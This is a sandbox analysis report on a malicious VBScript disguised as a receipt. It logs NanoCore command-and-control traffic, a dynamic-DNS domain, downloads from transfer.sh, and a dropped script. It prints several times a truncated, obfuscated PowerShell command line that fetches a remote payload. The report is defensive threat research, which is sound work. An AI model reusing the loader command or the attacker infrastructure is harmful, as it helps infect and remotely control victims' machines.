Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb'G source: powershell.exe, 00000003.00000003.774854089.000001BADF727000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000003.774854089.000001BADF727000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49833 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49834 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49835 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49838 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49841 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49842 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49843 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49844 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49845 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49846 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49847 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49848 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49849 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49850 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49851 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49852 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49853 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49854 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49855 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49856 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49857 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49858 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49859 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49860 -> 194.147.140.20:6700

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: newjan.duckdns.org

Source: Joe Sandbox View

ASN Name: PTPEU PTPEU

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /pNpqqh/yghtf.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5mLV5X/nyuh.txt HTTP/1.1Host: transfer.sh

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49755 version: TLS 1.0

Source: global traffic

TCP traffic: 192.168.2.4:49833 -> 194.147.140.20:6700

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: powershell.exe, 00000003.00000002.830219720.000001BAC5755000.00000004.00000040.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micrX
Source: powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.832935033.000001BAC74E6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.830844312.000001BAC7091000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.832935033.000001BAC74E6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	String found in binary or memory: http://www.m.com/pki/certs/MPCA_2010-07-01.c
Source: powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000003.00000002.833918185.000001BAC7766000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/5mLV5X/nyuh.txt
Source: powershell.exe, 00000003.00000002.831979120.000001BAC729C000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/pNpqqh/yghtf.txt

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /pNpqqh/yghtf.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5mLV5X/nyuh.txt HTTP/1.1Host: transfer.sh

E-Banking Fraud:

System Summary:

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('			Jump to behavior

Very long command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3046
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3046			Jump to behavior

Source: 14 Items receipt.vbs, type: SAMPLE	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_740.amsi.csv, type: OTHER	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.852066137.000001E92ABE5000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.851319653.000001E92A949000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.850032751.000001E92A945000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.850431281.000001E92A96B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.852419198.000001E92C690000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.851342619.000001E92A954000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.851386898.000001E92A96C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.850214818.000001E92A953000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000002.851469736.000001E92A97A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.850267004.000001E92A948000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000001.00000003.849051938.000001E92C691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: C:\Users\Public\Run\New.vbs, type: DROPPED	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =

Source: 14 Items receipt.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\14 Items receipt.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
